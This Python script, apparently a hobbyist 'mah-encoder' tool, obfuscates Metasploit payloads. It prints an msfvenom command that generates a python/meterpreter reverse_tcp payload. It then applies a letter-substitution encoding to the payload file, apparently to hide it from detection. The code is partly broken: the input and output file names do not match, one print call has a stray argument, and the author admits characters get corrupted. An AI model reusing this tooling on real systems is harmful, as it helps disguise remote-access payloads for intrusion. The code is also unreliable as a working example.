from termcolor import colored
import pyfiglet
def cool_banner_print(text="banner"):
    text = str(text)
    cbprint = pyfiglet.figlet_format(text)
    print(colored(cbprint, "blue", attrs=["blink"]))
cool_banner_print("mah-encoder")
print(colored("please using payload: python/meterpreter/reverse_tcp", "yellow"))
print("The interactive mode has not been made yet. If done, it will most likely be a module to the mah-framework.\n let me know. Greetings and respect to the commander.\n Sometimes the encoder makes 'c' to 'd' due to a compilation error in my msphenom, but normally it's fine.","red")
print("msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o localhost_4444_payload.txt")
def rep(text):
    text = text.replace("A"  , "/-1-/")
    text = text.replace("a"  , "/-2-/")
    text = text.replace("B"  , "/-3-/")
    text = text.replace("b"  , "/-4-/")
    text = text.replace("C"  , "/-5-/")
    text = text.replace("c"  , "/-6-/")
    text = text.replace("D"  , "/-7-/")
    text = text.replace("d"  , "/-8-/")
    text = text.replace("E"  , "/-9-/")
    text = text.replace("e"  , "/-10-/")
    text = text.replace("F"  , "/-11-/")
    text = text.replace("f"  , "/-12-/")
    text = text.replace("G"  , "/-13-/")
    text = text.replace("g"  , "/-14-/")
    text = text.replace("H"  , "/-15-/")
    text = text.replace("h"  , "/-16-/")
    text = text.replace("I"  , "/-17-/")
    text = text.replace("i"  , "/-18-/")
    text = text.replace("J"  , "/-19-/")
    text = text.replace("j"  , "/-20-/")
    text = text.replace("K"  , "/-21-/")
    text = text.replace("k"  , "/-22-/")
    text = text.replace("L"  , "/-23-/")
    text = text.replace("l"  , "/-24-/")
    text = text.replace("M"  , "/-25-/")
    text = text.replace("m"  , "/-26-/")
    text = text.replace("N"  , "/-27-/")
    text = text.replace("n"  , "/-28-/")
    text = text.replace("O"  , "/-29-/")
    text = text.replace("o"  , "/-30-/")
    text = text.replace("P"  , "/-31-/")
    text = text.replace("p"  , "/-32-/")
    text = text.replace("Q"  , "/-33-/")
    text = text.replace("q"  , "/-34-/")
    text = text.replace("R"  , "/-35-/")
    text = text.replace("r"  , "/-36-/")
    text = text.replace("S"  , "/-37-/")
    text = text.replace("s"  , "/-38-/")
    text = text.replace("T"  , "/-39-/")
    text = text.replace("t"  , "/-40-/")
    text = text.replace("U"  , "/-41-/")
    text = text.replace("u"  , "/-42-/")
    text = text.replace("V"  , "/-43-/")
    text = text.replace("v"  , "/-44-/")
    text = text.replace("W"  , "/-45-/")
    text = text.replace("w"  , "/-46-/")
    text = text.replace("X"  , "/-47-/")
    text = text.replace("x"  , "/-48-/")
    text = text.replace("Y"  , "/-49-/")
    text = text.replace("y"  , "/-50-/")
    text = text.replace("Z"  , "/-51-/")
    text = text.replace("z"  , "/-52-/")
    """
    text = text.replace("0"  , "~1~")
    text = text.replace("1"  , "2")
    text = text.replace("2"  , "3")
    text = text.replace("3"  , "4")
    text = text.replace("4"  , "5")
    text = text.replace("5"  , "6")
    text = text.replace("6"  , "7")
    text = text.replace("7"  , "8")
    text = text.replace("8"  , "9")
    text = text.replace("9"  , "0")
    text = text.replace("!"  , "'")
    text = text.replace("'"  , "!")
    text = text.replace("."  , ":")
    text = text.replace(":"  , ".")
    """#sadece sayı ve 

    return text
print(rep("hello"))
# özel karekterleri sonra hâl et
def de_rep(text):
    text = text.replace("/-1-/" , "A")
    text = text.replace("/-2-/" , "a")
    text = text.replace("/-3-/" , "B")
    text = text.replace("/-4-/" , "b")
    text = text.replace("/-5-/" , "C")
    text = text.replace("/-6-/" , "c")
    text = text.replace("/-7-/" , "D")
    text = text.replace("/-8-/" , "d")
    text = text.replace("/-9-/" , "E")
    text = text.replace("/-10-/" , "e")
    text = text.replace("/-11-/" , "F")
    text = text.replace("/-12-/" , "f")
    text = text.replace("/-13-/" , "G")
    text = text.replace("/-14-/" , "g")
    text = text.replace("/-15-/" , "H")
    text = text.replace("/-16-/" , "h")
    text = text.replace("/-17-/" , "I")
    text = text.replace("/-18-/" , "i")
    text = text.replace("/-19-/" , "J")
    text = text.replace("/-20-/" , "j")
    text = text.replace("/-21-/" , "K")
    text = text.replace("/-22-/" , "k")
    text = text.replace("/-23-/" , "L")
    text = text.replace("/-24-/" , "l")
    text = text.replace("/-25-/" , "M")
    text = text.replace("/-26-/" , "m")
    text = text.replace("/-27-/" , "N")
    text = text.replace("/-28-/" , "n")
    text = text.replace("/-29-/" , "O")
    text = text.replace("/-30-/" , "o")
    text = text.replace("/-31-/" , "P")
    text = text.replace("/-32-/" , "p")
    text = text.replace("/-33-/" , "Q")
    text = text.replace("/-34-/" , "q")
    text = text.replace("/-35-/" , "R")
    text = text.replace("/-36-/" , "r")
    text = text.replace("/-37-/" , "S")
    text = text.replace("/-38-/" , "s")
    text = text.replace("/-39-/" , "T")
    text = text.replace("/-40-/" , "t")
    text = text.replace("/-41-/" , "U")
    text = text.replace("/-42-/" , "u")
    text = text.replace("/-43-/" , "V")
    text = text.replace("/-44-/" , "v")
    text = text.replace("/-45-/" , "W")
    text = text.replace("/-46-/" , "w")
    text = text.replace("/-47-/" , "X")
    text = text.replace("/-48-/" , "x")
    text = text.replace("/-49-/" , "Y")
    text = text.replace("/-50-/" , "y")
    text = text.replace("/-51-/" , "Z")
    text = text.replace("/-52-/" , "z")

    return text
def test():
    Fi = open("lhost_4444_payload.txt","r",encoding='utf-8')
    ente = rep(Fi.read())
    f1 = open("de_payload.txt","w",encoding='utf-8')
    f1.write(ente)
    f2 = open("de_payload.txt","r",encoding='utf-8')
    dect = de_rep(f2.read())
    f3 = open("payload.txt","w")
    f3.write(dect)



